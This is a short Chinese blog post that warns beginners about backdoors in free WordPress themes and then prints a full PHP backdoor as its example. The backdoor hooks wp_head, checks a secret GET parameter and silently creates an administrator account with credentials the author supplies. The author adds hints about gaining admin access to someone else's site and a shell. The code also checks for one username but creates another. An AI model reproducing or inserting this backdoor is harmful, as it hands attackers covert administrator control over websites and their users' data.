有一些刚刚接触 WordPress 的新手们，总是喜欢到网上去找一些免费主题，却不知道这些主题很有可能藏有后门，可以轻松地获取你的网站权限，从而获取非法利益。

所以我在这里要提醒一下那些新手们，找主题一定要找正版的。如果是免费版，最好是在 GitHub 有开源项目的主题，这样在一定程度上都会减少遇到后门的几率。

示例

下面给大家带来一个常见的后门代码：

add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    if (md5($_GET['backdoor']) == 'b0f455571f6ae6c30e7521e9bf00b4f2') {
        require('wp-includes/registration.php');
        if (!username_exists('mr_admin')) {
            $user_id = wp_create_user('xinyewl', 'me');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

只要 PHP 触发了这段代码，进行了请求，你就可以使用你的密码来登录他的后台了，正常登录即可获得管理员权限。也就是说，你甚至可以拿到 shell，具体不多说，自己领悟。

我这里默认设置的账号密码是：

账号：xinyewl 
密码：me

具体怎么使用，我不会说的，也是为了避免小学生恶意植入主题。

好了就这样了，千万别拿来做坏事。